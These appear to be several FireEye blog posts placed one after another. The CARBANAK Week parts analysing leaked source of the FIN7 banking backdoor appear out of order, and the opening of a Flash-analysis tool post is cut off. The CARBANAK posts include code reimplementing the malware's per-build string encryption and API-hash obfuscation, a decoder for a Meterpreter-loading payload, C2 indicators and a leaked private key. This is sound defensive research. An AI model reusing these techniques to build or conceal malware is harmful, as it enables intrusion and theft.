Let’s first take a look at our deduction about a build tool for CARBANAK:

“A build tool is likely being used by these attackers that allows the operator to configure details such as C2 addresses, C2 encryption keys, and a campaign code. This build tool encrypts the binary’s strings with a fresh key for each build.”

We came to this deduction from the following evidence:

“Most of CARBANAK’s strings are encrypted in order to make analysis more difficult. We have observed that the key and the cipher texts for all the encrypted strings are changed for each sample that we have encountered, even amongst samples with the same compile time. The RC2 key used for the HTTP protocol has also been observed to change among samples with the same compile time. These observations paired with the use of campaign codes that must be configured denote the likely existence of a build tool.”

Figure 1 shows three keys used to decode the strings in CARBANAK, each pulled from a different CARBANAK sample.


Figure 1: Decryption keys for strings in CARBANAK are unique for each build

It turns out we were spot-on with this deduction. A build tool was discovered in the CARBANAK source dump, pictured with English translations in Figure 2.


Figure 2: CARBANAK build tool

With this build tool, you specify a set of configuration options along with a template CARBANAK binary, and it bakes the configuration data into the binary to produce the final build for distribution. The Prefix text field allows the operator to specify a campaign code. The Admin host text fields are for specifying C2 addresses, and the Admin password text field is the secret used to derive the RC2 key for encrypting communication over CARBANAK’s pseudo-HTTP protocol. This covers part of our deduction: we now know for a fact that a build tool exists and is used to configure the campaign code and RC2 key for the build, amongst other items. But what about the encoded strings? Since this would be something that happens seamlessly behind the scenes, it makes sense that no evidence of it would be found in the GUI of the build tool. To learn more, we had to go to the source code for both the backdoor and the build tool.

Figure 3 shows a preprocessor identifier named ON_CODE_STRING defined in the CARBANAK backdoor source code that, when enabled, defines macros that wrap all strings the programmer wishes to encode in the binary. These macros sandwich the strings to be encoded with the markers “BS” and “ES”. Figure 4 shows a small snippet of code from the header file of the build tool source code defining BEG_ENCODE_STRING as “BS” and END_ENCODE_STRING as “ES”. The build tool searches the template binary for these “BS” and “ES” markers, extracts the strings between them, encodes them with a randomly generated key, and replaces the strings in the binary with the encoded strings. We came across a binary named bot.dll that happened to be one of the template binaries used by the build tool. Running strings on this binary revealed that most meaningful strings specific to the workings of the CARBANAK backdoor were, in fact, sandwiched between “BS” and “ES”, as shown in Figure 5.


Figure 3: ON_CODE_STRING parameter enables easy string wrapper macros to prepare strings for encoding by build tool


Figure 4: builder.h macros for encoded string markers


Figure 5: Encoded string markers in template CARBANAK binary
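To make the builder’s string-encoding pass concrete, here is a hedged sketch of the workflow just described. The single-byte XOR and the null padding used to keep offsets stable are illustrative assumptions, not the builder’s actual algorithm.

```python
import os
import re

# Strings to encode are sandwiched between the "BS" and "ES" markers.
MARKED = re.compile(rb"BS(.*?)ES", re.S)

def encode_marked_strings(template):
    """Replace every marked string in a template binary with an encoded
    version, roughly as the CARBANAK build tool does. The XOR scheme and
    the padding are assumptions made for this illustration."""
    key = os.urandom(1)[0]  # fresh key for each build

    def encode(match):
        encoded = bytes(b ^ key for b in match.group(1))
        # Pad to the original match length so the binary's layout is unchanged.
        return encoded.ljust(len(match.group(0)), b"\x00")

    return MARKED.sub(encode, template), key
```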

Operators’ Access To Source Code

Let’s look at two more related deductions from our blog post:

“Based upon the information we have observed, we believe that at least some of the operators of CARBANAK either have access to the source code directly with knowledge on how to modify it or have a close relationship to the developer(s).”

“Some of the operators may be compiling their own builds of the backdoor independently.”

The first deduction was based on the following evidence:

“Despite the likelihood of a build tool, we have found 57 unique compile times in our sample set, with some of the compile times being quite close in proximity. For example, on May 20, 2014, two builds were compiled approximately four hours apart and were configured to use the same C2 servers. Again, on July 30, 2015, two builds were compiled approximately 12 hours apart.”

To investigate further, we performed a diff of two CARBANAK samples with very close compile times to see what, if anything, was changed in the code. Figure 6 shows one such difference.


Figure 6: Minor differences between two closely compiled CARBANAK samples

The POSLogMonitorThread function is only executed in Sample A, while the blizkoThread function is only executed in Sample B (Blizko is a Russian funds transfer service, similar to PayPal). The POSLogMonitorThread function monitors for changes made to log files for specific point of sale software and sends parsed data to the C2 server. The blizkoThread function determines whether the user of the computer is a Blizko customer by searching for specific values in the registry. With knowledge of these slight differences, we searched the source code and discovered once again that preprocessor parameters were put to use. Figure 7 shows how this function will change depending on which of three compile-time parameters are enabled.


Figure 7: Preprocessor parameters determine which functionality will be included in a template binary

This is not definitive proof that operators had access to the source code, but it certainly makes it much more plausible. The operators would not need to have any programming knowledge in order to fine tune their builds to meet their needs for specific targets, just simple guidance on how to add and remove preprocessor parameters in Visual Studio.

Evidence for the second deduction was found by looking at the binary C2 protocol implementation and how it has evolved over time. From our previous blog post:

“This protocol has undergone several changes over the years, each version building upon the previous version in some way. These changes were likely introduced to render existing network signatures ineffective and to make signature creation more difficult.”

Five versions of the binary C2 protocol were discovered amongst our sample set, as shown in Figure 8, which plots the earliest compile time at which each protocol version appeared. Each new version improved the security and complexity of the protocol.


Figure 8: Binary C2 protocol evolution shown through binary compilation times

If the CARBANAK project was centrally located and only the template binaries were delivered to the operators, it would be expected that sample compile times should fall in line with the evolution of the binary protocol. Except for one sample that implements what we call “version 3” of the protocol, this is how our timeline looks. A probable explanation for the date not lining up for version 3 is that our sample set was not wide enough to include the first sample of this version. This is not the only case we found of an outdated protocol being implemented in a sample; Figure 9 shows another example of this.


Figure 9: CARBANAK sample using outdated version of binary protocol

In this example, a CARBANAK sample found in the wild was using protocol version 4 when a newer version had already been available for at least two months. This would be unlikely if the source code were kept in a single, central location. The rapid-fire fine-tuning of template binaries using preprocessor parameters, combined with several in-the-wild CARBANAK samples implementing outdated versions of the protocol, indicates that the CARBANAK project is distributed to operators rather than kept centrally.

Names of Previously Unidentified Commands

The source code revealed the names of commands that were previously unidentified. In fact, it also revealed commands that were altogether absent from the samples we previously blogged about because the functionality was disabled. Table 1 shows the commands whose names were newly discovered in the CARBANAK source code, along with a summary of our analysis from the blog post.

Hash | Prior FireEye Analysis | Name
0x749D968 | (absent) | msgbox
0x6FD593 | (absent) | ifobs
0xB22A5A7 | Add/update klgconfig | updklgcfg
0x4ACAFC3 | Upload files to the C2 server | findfiles
0xB0603B4 | Download and execute shellcode | tinymet

Table 1: Command hashes previously not identified by name, along with description from prior FireEye analysis

The msgbox command was commented out altogether in the CARBANAK source code, and is strictly for debugging, so it never appeared in public analyses. Likewise, the ifobs command did not appear in the samples we analyzed and publicly documented, but likely for a different reason. The source code in Figure 10 shows the table of commands that CARBANAK understands, and the ifobs command (0x6FD593) is surrounded by an #ifdef, preventing the ifobs code from being compiled into the backdoor unless the ON_IFOBS preprocessor parameter is enabled.


Figure 10: Table of commands from CARBANAK tasking code

One of the more interesting commands, however, is tinymet, because it illustrates how source code can be both helpful and misleading.

The tinymet Command and Associated Payload

At the time of our initial CARBANAK analysis, we indicated that command 0xB0603B4 (whose name was unknown at the time) could execute shellcode. The source code reveals that the command (whose actual name is tinymet) was intended to execute a very specific piece of shellcode. Figure 11 shows an abbreviated listing of the code for handling the tinymet command, with line numbers in yellow and selected lines hidden (in gray) to show the code in a more compact format.


Figure 11: Abbreviated tinymet code listing

The comment starting on line 1672 indicates:

tinymet command
Command format: tinymet {ip:port | plugin_name} [plugin_name]
Retrieve meterpreter from specified address and launch in memory

On line 1710, the tinymet command handler uses the single-byte XOR key 0x50 to decode the shellcode. Of note, on line 1734 the command handler allocates five extra bytes and line 1739 hard-codes a five-byte mov instruction into that space. It populates the 32-bit immediate operand of the mov instruction with the socket handle number for the server connection that it retrieved the shellcode from. The implied destination operand for this mov instruction is the edi register.

Our analysis of the tinymet command ended here, until the binary file named met.plug was discovered. The hex dump in Figure 12 shows the end of this file.


Figure 12: Hex dump of met.plug

The end of the file is misaligned by five missing bytes, corresponding to the dynamically assembled mov edi preamble in the tasking source code. However, the single-byte XOR key 0x50 that was found in the source code did not succeed in decoding this file. After some confusion and further analysis, it was realized that the first 27 bytes of this file are a shellcode decoder that looked very similar to call4_dword_xor. Figure 13 shows the shellcode decoder and the beginning of the encoded metsrv.dll. The XOR key the shellcode uses is 0xEF47A2D0 which fits with how the five-byte mov edi instruction, decoder, and adjacent metsrv.dll will be laid out in memory.


Figure 13: Shellcode decoder

Decoding yielded a copy of metsrv.dll starting at offset 0x1b. When shellcode execution exits the decoder loop, it falls through into the DOS header of metsrv.dll, which Metasploit makes executable.
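For readers who want to reproduce the decoding, the sketch below reflects our understanding of the layout: a five-byte mov edi, imm32 preamble carrying the socket handle, the 27-byte decoder, and then the encoded metsrv.dll, recovered by XORing 32-bit dwords with 0xEF47A2D0. Treat this as an approximation; it assumes a plain, static dword-wise XOR in the style of call4_dword_xor, and the exact decoder semantics should be confirmed against the sample.

```
import struct

XOR_KEY = 0xEF47A2D0      # dword key recovered from the decoder stub
DECODER_LEN = 0x1b        # 27-byte decoder preamble at the start of met.plug

def build_preamble(socket_handle: int) -> bytes:
    # mov edi, imm32 is opcode 0xBF followed by a 32-bit immediate;
    # CARBANAK assembles these five bytes at runtime in front of the shellcode.
    return b"\xbf" + struct.pack("<I", socket_handle)

def decode_met_plug(data: bytes) -> bytes:
    """XOR-decode the payload that follows the 27-byte decoder, one dword at a
    time (assumed to be a static XOR, similar to Metasploit's call4_dword_xor)."""
    body = data[DECODER_LEN:]
    out = bytearray()
    for off in range(0, len(body) - 3, 4):
        (dword,) = struct.unpack_from("<I", body, off)
        out += struct.pack("<I", dword ^ XOR_KEY)
    return bytes(out)   # should begin with metsrv.dll's MZ header

if __name__ == "__main__":
    with open("met.plug", "rb") as f:
        decoded = decode_met_plug(f.read())
    print(decoded[:2])   # expect b"MZ" if the assumptions hold
```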

Ironically, possessing source code biased our binary analysis in the wrong direction, suggesting a single-byte XOR key when in reality there was a 27-byte decoder preamble using a four-byte XOR key. Furthermore, the command's name, tinymet, suggested that the TinyMet Meterpreter stager was involved. This may have been the case at one point, but the source code comments and binary files suggest that the developers and operators have moved on to simply downloading Meterpreter directly without changing the name of the command.

Conclusion

Having access to the source code and toolset for CARBANAK provided us with a unique opportunity to revisit our previous analysis. We were able to fill in missing analysis and context, validate our deductions in some cases, and provide further supporting evidence in others, strengthening our confidence in them without completely proving them true. This exercise shows that with a large enough sample set and enough analysis, accurate deductions can be reached, some of which go beyond what the source code alone reveals. It also illustrates, as in the case of the tinymet command, that without the proper context you sometimes cannot see the full purpose of a given piece of code. Source code can also be inconsistent with the accompanying binaries. If Bruce Lee had been a malware analyst, he might have said that source code is like a finger pointing away to the moon; don’t concentrate on the finger, or you will miss all that binary ground truth. Source code can provide immensely rich context, but analysts must be cautious not to misapply that context to binary or forensic artifacts.

In the next and final blog post, we share details on an interesting tool that is part of the CARBANAK kit: a video player designed to play back desktop recordings captured by the backdoor.

CARBANAK Week Part Two: Continuing the CARBANAK Source Code Analysis

FireEye has observed the certificate most recently being served on the following IPs (Table 4):

IP | Hostname | Last Seen
104.193.252.151:443 | vds2.system-host[.]net | 2019-04-26T14:49:12
185.180.196.35:443 | customer.clientshostname[.]com | 2019-04-24T07:44:30
213.227.155.8:443 |  | 2019-04-24T04:33:52
94.156.133.69:443 |  | 2018-11-15T10:27:07
185.174.172.241:443 | vds9992.hyperhost[.]name | 2019-04-27T13:24:36
109.230.199.227:443 |  | 2019-04-27T13:24:36

Table 4: Recent Test Company certificate use

While these IPs have not been observed in any CARBANAK activity, this may be an indication of a common developer or a shared toolkit used for testing various malware. Several of these IPs have been observed hosting Cobalt Strike BEACON payloads and METERPRETER listeners. Virtual Private Server (VPS) IPs may change hands frequently and additional malicious activity hosted on these IPs, even in close time proximity, may not be associated with the same users.

I also parsed an unprotected private key from the source code dump. Figure 4 and Table 5 show the private key parameters at a glance and in detail, respectively.


Figure 4: Parsed 512-bit private key

Field | Value
bType | 7
bVersion | 2
aiKeyAlg | 0xA400 (CALG_RSA_KEYX) – RSA public key exchange algorithm
Magic | RSA2
Bitlen | 512
PubExp | 65537
Modulus | 0B CA 8A 13 FD 91 E4 72 80 F9 5F EE 38 BC 2E ED 20 5D 54 03 02 AE D6 90 4B 6A 6F AE 7E 06 3E 8C EA A8 15 46 9F 3E 14 20 86 43 6F 87 BF AE 47 C8 57 F5 1F D0 B7 27 42 0E D1 51 37 65 16 E4 93 CB
P | 8B 01 8F 7D 1D A2 34 AE CA B6 22 EE 41 4A B9 2C E0 05 FA D0 35 B2 BF 9C E6 7C 6E 65 AC AE 17 EA
Q | 81 69 AB 3D D7 01 55 7A F8 EE 3C A2 78 A5 1E B1 9A 3B 83 EC 2F F1 F7 13 D8 1A B3 DE DF 24 A1 DE
Dp | B5 C7 AE 0F 46 E9 02 FB 4E A2 A5 36 7F 2E ED A4 9E 2B 0E 57 F3 DB 11 66 13 5E 01 94 13 34 10 CB
Dq | 81 AC 0D 20 14 E9 5C BF 4B 08 54 D3 74 C4 57 EA C3 9D 66 C9 2E 0A 19 EA C1 A3 78 30 44 52 B2 9F
Iq | C2 D2 55 32 5E 7D 66 4C 8B 7F 02 82 0B 35 45 18 24 76 09 2B 56 71 C6 63 C4 C5 87 AD ED 51 DA 2A
D | 01 6A F3 FA 6A F7 34 83 75 C6 94 EB 77 F1 C7 BB 7C 68 28 70 4D FB 6A 67 03 AE E2 D8 8B E9 E8 E0 2A 0F FB 39 13 BD 1B 46 6A D9 98 EA A6 3E 63 A8 2F A3 BD B3 E5 D6 85 98 4D 1C 06 2A AD 76 07 49

Table 5: Private key parameters

I found a value named PUBLIC_KEY defined in a configuration header, with comments indicating it was for debugging purposes. The parsed values are shown in Table 6.

Field | Value
bType | 6
bVersion | 2
aiKeyAlg | 0xA400 (CALG_RSA_KEYX) – RSA public key exchange algorithm
Magic | RSA1
Bitlen | 512
PubExp | 65537
Modulus | 0B CA 8A 13 FD 91 E4 72 80 F9 5F EE 38 BC 2E ED 20 5D 54 03 02 AE D6 90 4B 6A 6F AE 7E 06 3E 8C EA A8 15 46 9F 3E 14 20 86 43 6F 87 BF AE 47 C8 57 F5 1F D0 B7 27 42 0E D1 51 37 65 16 E4 93 CB

Table 6: Key parameters for PUBLIC_KEY defined in configuration header

Network Based Indicators

The source code and binaries contained multiple Network-Based Indicators (NBIs) having significant overlap with CARBANAK backdoor activity and FIN7 operations previously observed and documented by FireEye. Table 7 shows these indicators along with the associated FireEye public documentation. This includes the status of each NBI as it was encountered (active in source code, commented out, or compiled into a binary). Domain names are de-fanged to prevent accidental resolution or interaction by browsers, chat clients, etc.

NBI | Status | Threat Group Association
comixed[.]org | Commented out | Earlier CARBANAK activity
194.146.180[.]40 | Commented out | Earlier CARBANAK activity
aaaabbbbccccc[.]org | Active |
stats10-google[.]com | Commented out | FIN7
192.168.0[.]100:700 | Active |
80.84.49[.]50:443 | Commented out |
52.11.125[.]44:443 | Commented out |
85.25.84[.]223 | Commented out |
qwqreererwere[.]com | Active |
akamai-technologies[.]org | Commented out | Earlier CARBANAK activity
192.168.0[.]100:700 | Active |
37.1.212[.]100:700 | Commented out |
188.138.98[.]105:710 | Commented out | Earlier CARBANAK activity
hhklhlkhkjhjkjk[.]org | Compiled |
192.168.0[.]100:700 | Compiled |
aaa.stage.4463714.news.meteonovosti[.]info | Compiled | DNS infrastructure overlap with later FIN7 associated POWERSOURCE activity
193.203.48[.]23:800 | Active | Earlier CARBANAK activity
Table 7: NBIs and previously observed activity

Four of these TCP endpoints (80.84.49[.]50:443, 52.11.125[.]44:443, 85.25.84[.]223, and 37.1.212[.]100:700) were new to me, although some have been documented elsewhere.

Conclusion

Our analysis of this source code dump confirmed it was CARBANAK and turned up a few new and interesting data points. We were able to notify vendors about disclosures that specifically targeted their security suites. The previously documented NBIs, Windows API function resolution, backdoor command hash values, usage of Windows cabinet file APIs, and other artifacts associated with CARBANAK all match, and as they say, if the shoe fits, wear it. Interestingly though, the project itself isn’t called CARBANAK or even Anunak as the information security community has come to call it based on the string artifacts found within the malware. The authors mainly refer to the malware as “bot” in the Visual Studio project, filenames, source code comments, output binaries, user interfaces, and manuals.

The breadth and depth of this analysis was a departure from the usual requests we receive on the FLARE team. The journey included learning some Russian, searching through a hundred thousand lines of code for new information, and analyzing a few dozen binaries. In the end, I’m thankful I had the opportunity to take this request.

In the next post, Tom Bennett takes the reins to provide a retrospective on his and Barry Vengerik’s previous analysis in light of the source code. Part Four of CARBANAK Week is available as well.

CARBANAK Week Part One: A Rare Occurrence

It is very unusual for FLARE to analyze a prolifically-used, privately-developed backdoor only to later have the source code and operator tools fall into our laps. Yet this is the extraordinary circumstance that sets the stage for CARBANAK Week, a four-part blog series that commences with this post.

CARBANAK is one of the most full-featured backdoors around. It was used to perpetrate millions of dollars in financial crimes, largely by the group we track as FIN7. In 2017, Tom Bennett and Barry Vengerik published Behind the CARBANAK Backdoor, which was the product of a deep and broad analysis of CARBANAK samples and FIN7 activity across several years. On the heels of that publication, our colleague Nick Carr uncovered a pair of RAR archives containing CARBANAK source code, builders, and other tools (both available in VirusTotal: kb3r1p and apwmie).

FLARE malware analysis requests are typically limited to a few dozen files at most. But the CARBANAK source code was 20MB comprising 755 files, with 39 binaries and 100,000 lines of code. Our goal was to find threat intelligence we missed in our previous analyses. How does an analyst respond to a request with such breadth and open-ended scope? And what did we find?

My friend Tom Bennett and I spoke about this briefly in our 2018 FireEye Cyber Defense Summit talk, Hello, Carbanak! In this blog series, we will expound at length and share a written retrospective on the inferences drawn in our previous public analysis based on binary code reverse engineering. In this first part, I’ll discuss Russian language concerns, translated graphical user interfaces of CARBANAK tools, and anti-analysis tactics as seen from a source code perspective. We will also explain an interesting twist where analyzing the source code surprisingly proved to be just as difficult as analyzing the binary, if not more. There’s a lot here; buckle up!

File Encoding and Language Considerations

The objective of this analysis was to discover threat intelligence gaps and better protect our customers. To begin, I wanted to assemble a cross-reference of source code files and concepts of specific interest.

Reading the source code entailed two steps: displaying the files in the correct encoding, and learning enough Russian to be dangerous. Figure 1 shows CARBANAK source code in a text editor that is unaware of the correct encoding.


Figure 1: File without proper decoding

Two good file encoding guesses are UTF-8 and code page 1251 (Cyrillic). The files were mostly code page 1251 as shown in Figure 2.


Figure 2: Code Page 1251 (Cyrillic) source code

Figure 2 is a C++ header file defining error values involved in backdoor command execution. Most identifiers were in English, but some were not particularly descriptive. Ergo, the second and more difficult step was learning some Russian to benefit from the context offered by the source code comments.

FLARE has fluent Russian speakers, but I took it upon myself to minimize my use of other analysts’ time. To this end, I wrote a script to tear through files and create a prioritized vocabulary list. The script, which is available in the FireEye vocab_scraper GitHub repository, walks source directories, finding all character sequences outside the printable lower ASCII range: decimal values 32 (the space character) through 126 (the tilde character “~”) inclusive. The script adds each word to a Python defaultdict and increments its count. Finally, the script orders this dictionary by frequency of occurrence and dumps it to a file.
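The published vocab_scraper script is the authoritative version; the snippet below is only a minimal sketch of the same idea (walk a source tree, collect runs of bytes outside printable lower ASCII, count them, and dump them by frequency), with a couple of practical liberties such as treating whitespace as a separator and decoding output as code page 1251.

```
import collections
import os
import re
import sys

# Runs of bytes outside printable lower ASCII (0x20 " " through 0x7e "~");
# CR/LF/tab are treated as separators here for readability.
NON_ASCII_RUN = re.compile(rb"[^\x20-\x7e\r\n\t]+")

def scrape_vocab(root: str) -> collections.Counter:
    counts = collections.Counter()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            with open(os.path.join(dirpath, name), "rb") as f:
                data = f.read()
            for run in NON_ASCII_RUN.findall(data):
                # The source files are mostly code page 1251; decode so the output is readable.
                counts[run.decode("cp1251", errors="replace")] += 1
    return counts

if __name__ == "__main__":
    vocab = scrape_vocab(sys.argv[1])
    with open("vocab.txt", "w", encoding="utf-8") as out:
        for word, n in vocab.most_common():
            out.write(f"{n}\t{word}\n")
```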

The result was a 3,400+ word vocabulary list, partially shown in Figure 3.


Figure 3: Top 19 Cyrillic character sequences from the CARBANAK source code

I spent several hours on Russian language learning websites to study the pronunciation of Cyrillic characters and Russian words. Then, I looked up the top 600+ words and created a small dictionary. I added Russian language input to an analysis VM and used Microsoft’s on-screen keyboard (osk.exe) to navigate the Cyrillic keyboard layout and look up definitions.

One helpful effect of learning to pronounce Cyrillic characters was my newfound recognition of English loan words (words that are borrowed from English and transliterated to Cyrillic). My small vocabulary allowed me to read many comments without looking anything up. Table 1 shows a short sampling of some of the English loan words I encountered.

Cyrillic | English Phonetic | English | Occurrences | Rank
Файл | f ah y L | file | 224 | 5
сервер | s e r v e r | server | 145 | 13
адрес | a d r e s | address | 52 | 134
команд | k o m a n d | command | 110+ | 27
бота | b o t a | bot | 130 | 32
плагин | p l ah g ee n | plugin | 116 | 39
сервис | s e r v ee s | service | 70 | 46
процесс | p r o ts e s s | process | 130ish | 63

Table 1: Sampling of English loan words in the CARBANAK source code

Aside from source code comments, understanding how to read and type in Cyrillic came in handy for translating the CARBANAK graphical user interfaces I found in the source code dump. Figure 4 shows a Command and Control (C2) user interface for CARBANAK that I translated.


Figure 4: Translated C2 graphical user interface

These user interfaces included video management and playback applications as shown in Figure 5 and Figure 6 respectively. Tom will share some interesting work he did with these in a subsequent part of this blog series.


Figure 5: Translated video management application user interface


Figure 6: Translated video playback application user interface

Figure 7 shows the backdoor builder that was contained within the RAR archive of operator tools.


Figure 7: Translated backdoor builder application user interface

The operator RAR archive also contained an operator’s manual explaining the semantics of all the backdoor commands. Figure 8 shows the first few commands in this manual, both in Russian and English (translated).


Figure 8: Operator manual (left: original Russian; right: translated to English)

Down the Rabbit Hole: When Having Source Code Does Not Help

In simpler backdoors, a single function evaluates the command ID received from the C2 server and dispatches control to the correct function to carry out the command. For example, a backdoor might ask its C2 server for a command and receive a response bearing the command ID 0x67. The dispatch function in the backdoor will check the command ID against several different values, including 0x67, which as an example might call a function to shovel a reverse shell to the C2 server. Figure 9 shows a control flow graph of such a function as viewed in IDA Pro. Each block of code checks against a command ID and either passes control to the appropriate command handling code, or moves on to check for the next command ID.


Figure 9: A control flow graph of a simple command handling function

In this regard, CARBANAK is an entirely different beast. It utilizes a Windows mechanism called named pipes as a means of communication and coordination across all the threads, processes, and plugins under the backdoor’s control. When the CARBANAK tasking component receives a command, it forwards the command over a named pipe where it travels through several different functions that process the message, possibly writing it to one or more additional named pipes, until it arrives at its destination where the specified command is finally handled. Command handlers may even specify their own named pipe to request more data from the C2 server. When the C2 server returns the data, CARBANAK writes the result to this auxiliary named pipe and a callback function is triggered to handle the response data asynchronously. CARBANAK’s named pipe-based tasking component is flexible enough to control both inherent command handlers and plugins. It also allows for the possibility of a local client to dispatch commands to CARBANAK without the use of a network. In fact, not only did we write such a client to aid in analysis and testing, but such a client, named botcmd.exe, was also present in the source dump.

Tom’s Perspective

Analyzing this command-handling mechanism within CARBANAK from a binary perspective was certainly challenging. It required maintaining tabs for many different views into the disassembly, and a sort of textual map of command ids and named pipe names to describe the journey of an inbound command through the various pipes and functions before arriving at its destination. Figure 10 shows the control flow graphs for seven of the named pipe message handling functions. While it was difficult to analyze this from a binary reverse engineering perspective, having compiled code combined with the features that a good disassembler such as IDA Pro provides made it less harrowing than Mike’s experience. The binary perspective saved me from having to search across several source files and deal with ambiguous function names. The disassembler features allowed me to easily follow cross-references for functions and global variables and to open multiple, related views into the code.


Figure 10: Control flow graphs for the named pipe message handling functions

Mike’s Perspective

Having source code sounds like cheat-mode for malware analysis. Indeed, source code contains much information that is lost through the compilation and linking process. Even so, CARBANAK’s tasking component (for handling commands sent by the C2 server) serves as a counter-example. Depending on the C2 protocol used and the command being processed, control flow may take divergent paths through different functions only to converge again later and accomplish the same command. Analysis required bouncing around between almost 20 functions in 5 files, often backtracking to recover information about function pointers and parameters that were passed in from as many as 18 layers back. Analysis also entailed resolving matters of C++ class inheritance, scope ambiguity, overloaded functions, and control flow termination upon named pipe usage. The overall effect was that this was difficult to analyze, even in source code.

I only embarked on this top-to-bottom journey once, to search for any surprises. The effort gave me an appreciation for the baroque machinery the authors constructed either for the sake of obfuscation or flexibility. I felt like this was done at least in part to obscure relationships and hinder timely analysis.

Anti-Analysis Mechanisms in Source Code

CARBANAK’s executable code is filled with logic that pushes hexadecimal numbers to the same function, followed by an indirect call against the returned value. This is easily recognizable as obfuscated function import resolution, wherein CARBANAK uses a simple string hash known as PJW (named after its author, P.J. Weinberger) to locate Windows API functions without disclosing their names. A Python implementation of the PJW hash is shown in Figure 11 for reference.

def pjw_hash(s):
    ctr = 0
    for i in range(len(s)):
        # Shift the running value and mix in the next character, keeping 32 bits.
        ctr = 0xffffffff & ((ctr << 4) + ord(s[i]))
        # Fold the high nibble back into the low bits whenever it becomes non-zero.
        if ctr & 0xf0000000:
            ctr = (((ctr & 0xf0000000) >> 24) ^ ctr) & 0x0fffffff
    return ctr

Figure 11: PJW hash

This is used several hundred times in CARBANAK samples and impedes understanding of the malware’s functionality. Fortunately, reversers can use the flare-ida scripts to annotate the obfuscated imports, as shown in Figure 12.


Figure 12: Obfuscated import resolution annotated with FLARE's shellcode hash search

The CARBANAK authors achieved this obfuscated import resolution throughout their backdoor with relative ease using C preprocessor macros and a pre-compilation source code scanning step to calculate function hashes. Figure 13 shows the definition of the relevant API macro and associated machinery.


Figure 13: API macro for import resolution

The API macro allows the author to type API(SHLWAPI, PathFindFileNameA)(…) and have it replaced with GetApiAddrFunc(SHLWAPI, hashPathFindFileNameA)(…). SHLWAPI is a symbolic macro defined to be the constant 3, and hashPathFindFileNameA is the string hash value 0xE3685D1 as observed in the disassembly. But how was the hash defined?

The CARBANAK source code has a utility (unimaginatively named tool) that scans source code for invocations of the API macro to build a header file defining string hashes for all the Windows API function names encountered in the entire codebase. Figure 14 shows the source code for this utility along with its output file, api_funcs_hash.h.


Figure 14: Source code and output from string hash utility
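As an illustration of how small such a code generation step can be, here is a hypothetical Python equivalent: scan the source tree for API(MODULE, Name) invocations and emit a header that defines hashName constants computed with the PJW routine from Figure 11. The regular expression, file extensions, and output format are guesses; only the overall workflow is taken from the CARBANAK utility.

```
import os
import re
import sys

API_CALL = re.compile(r"\bAPI\s*\(\s*\w+\s*,\s*(\w+)\s*\)")

def pjw_hash(s: str) -> int:
    # Same algorithm as Figure 11.
    ctr = 0
    for ch in s:
        ctr = 0xffffffff & ((ctr << 4) + ord(ch))
        if ctr & 0xf0000000:
            ctr = (((ctr & 0xf0000000) >> 24) ^ ctr) & 0x0fffffff
    return ctr

def generate_header(src_root: str, out_path: str = "api_funcs_hash.h") -> None:
    names = set()
    for dirpath, _dirs, files in os.walk(src_root):
        for fname in files:
            if fname.endswith((".c", ".cpp", ".h")):
                path = os.path.join(dirpath, fname)
                with open(path, encoding="cp1251", errors="ignore") as f:
                    names.update(API_CALL.findall(f.read()))
    with open(out_path, "w") as out:
        out.write("#pragma once\n")
        for name in sorted(names):
            out.write(f"#define hash{name} 0x{pjw_hash(name):X}\n")

if __name__ == "__main__":
    generate_header(sys.argv[1])
```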

When I reverse engineer obfuscated malware, I can’t help but theorize about how the authors implemented their obfuscations. The CARBANAK source code offers another data point on how malware authors wield the powerful C preprocessor, along with custom code scanning and code generation tools, to obfuscate without imposing an undue burden on developers. This may help set expectations for what malware authors will do in the future, and it may help identify units of potential code reuse in future projects as well as rate their significance. It would be trivial to apply this to new projects, but with the source code being available on VirusTotal, this level of code sharing may not represent shared authorship. The source code also plainly answers why the malware pushes an integer in addition to a hash when resolving functions: the integer is an index into an array of module handles that are opened in advance and associated with these pre-defined integers.

Conclusion

The CARBANAK source code is illustrative of how these malware authors addressed some of the practical concerns of obfuscation. Both the tasking code and the Windows API resolution system represent significant investments in throwing malware analysts off the scent of this backdoor. Check out Part Two of this series for a round-up of antivirus evasions, exploits, secrets, key material, authorship artifacts, and network-based indicators. Part Three and Part Four are available now as well!

FLASHMINGO: The FireEye Open Source Automatic Analysis Tool for Flash

Adobe Flash is one of the most exploited software components of the last decade. Its complexity and ubiquity make it an obvious target for attackers. Public sources list more than one thousand CVEs being assigned to the Flash Player alone since 2005. Almost nine hundred of these vulnerabilities have a Common Vulnerability Scoring System (CVSS) score of nine or higher.

After more than a decade of playing cat and mouse with the attackers, Adobe is finally deprecating Flash in 2020. To the security community this move is not a surprise since all major browsers have already dropped support for Flash.

A common misconception exists that Flash is already a thing of the past; however, history has shown us that legacy technologies linger for quite a long time. If organizations do not phase Flash out in time, the security threat may grow beyond Flash's end of life due to a lack of security patches.

As malware analysts on the FLARE team, we still see Flash exploits within malware samples. We must find a compromise between the need to analyse Flash samples and the correct amount of resources to be spent on a declining product. To this end we developed FLASHMINGO, a framework to automate the analysis of SWF files. FLASHMINGO enables analysts to triage suspicious Flash samples and investigate them further with minimal effort. It integrates into various analysis workflows as a stand-alone application or can be used as a powerful library. Users can easily extend the tool's functionality via custom Python plug-ins.

Background: SWF and ActionScript3

Before we dive into the inner workings of FLASHMINGO, let’s learn about the Flash architecture. Flash’s SWF files are composed of chunks, called tags, implementing a specific functionality. Tags are completely independent from each other, allowing for compatibility with older versions of Flash. If a tag is not supported, the software simply ignores it. The main source of security issues revolves around SWF’s scripting language: ActionScript3 (AS3). This scripting language is compiled into bytecode and placed within a Do ActionScript ByteCode (DoABC) tag. If a SWF file contains a DoABC tag, the bytecode is extracted and executed by a proprietary stack-based virtual machine (VM), known as AVM2 in the case of AS3, shipped within Adobe’s Flash player. The design of the AVM2 was based on the Java VM and was similarly plagued by memory corruption and logical issues that allowed malicious AS3 bytecode to execute native code in the context of the Flash player. In the few cases where the root cause of past vulnerabilities was not in the AVM2, ActionScript code was still necessary to put the system in a state suitable for reliable exploitation. For example, by grooming the heap before triggering a memory corruption. For these reasons, FLASHMINGO focuses on the analysis of AS3 bytecode.

Tool Architecture

FLASHMINGO leverages the open source SWIFFAS library to do the heavy lifting of parsing Flash files. All binary data and bytecode are parsed and stored in a large object named SWFObject. This object contains all the information about the SWF relevant to our analysis: a list of tags, information about all methods, strings, constants and embedded binary data, to name a few. It is essentially a representation of the SWF file in an easily queryable format.

FLASHMINGO is a collection of plug-ins that operate on the SWFObject and extract interesting information. Figure 1 shows the relationship between FLASHMINGO, its plug-ins, and the SWFObject.


Figure 1: High level software structure

Several useful plug-ins covering a wide range of common analysis are already included with FLASHMINGO, including:

